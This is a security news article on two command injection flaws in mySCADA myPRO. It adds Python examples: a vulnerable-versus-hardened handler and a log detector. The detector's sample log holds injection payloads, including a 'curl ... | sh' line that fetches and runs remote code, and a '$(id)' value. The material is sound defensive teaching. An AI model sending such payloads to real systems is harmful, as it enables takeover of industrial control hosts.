Cybersecurity researchers have identified two critical vulnerabilities in mySCADA myPRO, a Supervisory Control and Data Acquisition (SCADA) system widely used in operational technology (OT) environments. Both flaws could allow threat actors to gain unauthorized control over affected systems.
"These vulnerabilities, if exploited, could grant unauthorized access to industrial control networks, potentially leading to severe operational disruptions and financial losses," said Swiss security firm PRODAFT.
Both flaws carry a CVSS v4 score of 9.3 and are operating system (OS) command injection bugs (CWE-78):
- CVE-2025-20014 – OS command injection via the version parameter of a crafted POST request.
- CVE-2025-20061 – OS command injection via the email parameter of a crafted POST request.
In both cases the parameter value reaches an OS command without being sanitized, so a remote attacker who can send the request can execute arbitrary commands on the underlying host with the privileges of the myPRO service.
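The following is an added example that illustrates the bug class described above; it is not mySCADA's code, and the handler, the `echo` command standing in for whatever tool the real service runs, and the allowlist patterns are all stand-ins chosen to mirror the advisory (a version and an email parameter reaching an OS command). It shows the vulnerable pattern (parameter spliced into a shell string) next to the hardened one (allowlist validation plus an argv list so no shell ever parses the value):

```python
"""Command injection via a POST parameter, and the fix.

Added example code, not mySCADA's. `echo` stands in for the real tool and
the allowlist rules are hypothetical, not mySCADA's validation logic.
"""
import re
import subprocess

# Allowlist patterns for the two parameters named in the advisory (hypothetical).
# Prevention validates against what is expected, never against a blocklist.
ALLOWED = {
    "version": re.compile(r"[0-9]+(\.[0-9]+){0,3}"),
    "email": re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}"),
}


def run_unsafe(version: str) -> str:
    """Vulnerable pattern: the parameter is spliced into a shell command string.

    With shell=True, /bin/sh parses `;`, `|`, `$(...)` etc. in `version` as
    syntax, so "1.0; echo INJECTED" runs a second command.
    """
    cmd = f"echo version={version}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def validate(name: str, value: str) -> str:
    """Reject anything outside the allowlist before it reaches a command."""
    if not ALLOWED[name].fullmatch(value):
        raise ValueError(f"invalid {name!r} parameter")
    return value


def run_argv_only(version: str) -> str:
    """Shell-free layer alone: the value is one literal argv element.

    Without a shell there is nothing to interpret metacharacters, so the
    payload is printed back verbatim instead of being executed.
    """
    return subprocess.run(["echo", f"version={version}"],
                          capture_output=True, text=True).stdout


def run_hardened(version: str) -> str:
    """Fixed pattern: allowlist validation first, then argv list, no shell."""
    return run_argv_only(validate("version", version))


if __name__ == "__main__":
    payload = "1.0; echo INJECTED"  # constructed test input
    print(run_unsafe(payload), end="")      # version=1.0 then INJECTED: two commands ran
    print(run_argv_only(payload), end="")   # one literal line, nothing executed
    try:
        run_hardened(payload)
    except ValueError as exc:
        print("rejected:", exc)
```

The two layers are independent: the allowlist stops bad input at the boundary, and the argv form means that even a value which slips past validation is never handed to a shell. Fixes that only escape or blocklist characters while keeping `shell=True` tend to be bypassed.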
Security Updates & Mitigation Measures
The issues have been addressed in the following patched versions:
- mySCADA PRO Manager 1.3
- mySCADA PRO Runtime 9.2.1
PRODAFT attributes both flaws to improper input validation: the version and email parameters are passed to the operating system without being sanitized, which gives an attacker a direct path to command injection.
"These vulnerabilities highlight the persistent security risks in SCADA systems and the need for stronger defenses," the company stated. "Exploitation could lead to operational disruptions, financial losses, and safety hazards."
Organizations using mySCADA myPRO should take immediate action by:
- Applying the latest patches (PRO Manager 1.3 and PRO Runtime 9.2.1, or later) to remove the vulnerable code paths.
- Isolating SCADA systems from IT networks through network segmentation, so the myPRO web interface is not reachable from untrusted networks.
- Enforcing strong authentication measures to prevent unauthorized access.
- Monitoring system activity for signs of exploitation, in particular POST requests whose version or email parameters contain shell metacharacters, and shells or unexpected child processes spawned by the myPRO service.
By implementing these cybersecurity best practices, organizations can fortify their SCADA environments against potential attacks.
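As an added example of the monitoring step above (not part of the advisory or of mySCADA's tooling), the following detector hunts for injection attempts against the two parameters the advisory names. It assumes a reverse proxy in front of the HMI that writes one JSON object per request including the decoded form fields under a `form` key; that log format and the sample lines are constructed for the example. Unlike the allowlist used for prevention, detection here looks for shell syntax that has no business in a version string or an e-mail address, so it also catches attempts against hosts that are not yet patched:

```python
"""Hunt for command-injection attempts in the version and email parameters.

Added example, not mySCADA's tooling. Assumes a reverse-proxy log with one
JSON record per request and decoded form fields under "form" (assumption).
"""
import json
import re

# Shell syntax not expected in a version or e-mail value: command substitution,
# separators, pipes, redirection, quoting, backslashes, embedded newlines.
SHELL_META = re.compile(r"\$\(|[;&|`$<>\\'\"\n]")

WATCHED_FIELDS = ("version", "email")

# Constructed sample log: two benign requests, two attempts from one source,
# and one GET that the detector ignores.
SAMPLE_LOG = """\
{"ts":"2025-03-05T10:01:02Z","src":"10.0.5.21","method":"POST","form":{"version":"9.2.1"}}
{"ts":"2025-03-05T10:01:09Z","src":"10.0.5.21","method":"POST","form":{"email":"ops@example.com"}}
{"ts":"2025-03-05T10:02:30Z","src":"198.51.100.7","method":"POST","form":{"version":"1.0; curl http://198.51.100.7/x | sh"}}
{"ts":"2025-03-05T10:02:31Z","src":"198.51.100.7","method":"POST","form":{"email":"a@b.com$(id)"}}
{"ts":"2025-03-05T10:03:00Z","src":"10.0.5.22","method":"GET","form":{}}
"""


def scan(log_text: str) -> list:
    """Return one finding per POST whose watched field contains shell syntax."""
    findings = []
    for lineno, raw in enumerate(log_text.splitlines(), 1):
        if not raw.strip():
            continue
        try:
            rec = json.loads(raw)
        except json.JSONDecodeError:
            # A log line that cannot be parsed is itself worth a look.
            findings.append({"line": lineno, "reason": "unparseable"})
            continue
        if rec.get("method") != "POST":
            continue
        form = rec.get("form") or {}
        for field in WATCHED_FIELDS:
            value = form.get(field)
            if not isinstance(value, str):
                continue
            hit = SHELL_META.search(value)
            if hit:
                findings.append({
                    "line": lineno,
                    "src": rec.get("src"),
                    "field": field,
                    "token": hit.group(0),   # first shell token seen
                    "value": value,
                })
    return findings


def by_source(findings: list) -> dict:
    """Count findings per source address to prioritise follow-up."""
    counts = {}
    for f in findings:
        if "src" in f:
            counts[f["src"]] = counts.get(f["src"], 0) + 1
    return counts


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h)
    print(by_source(hits))
```

Any hit from outside the OT segment is a strong signal on its own; a hit from an internal address still deserves a look at which host issued it, since the same payload could come from a compromised engineering workstation.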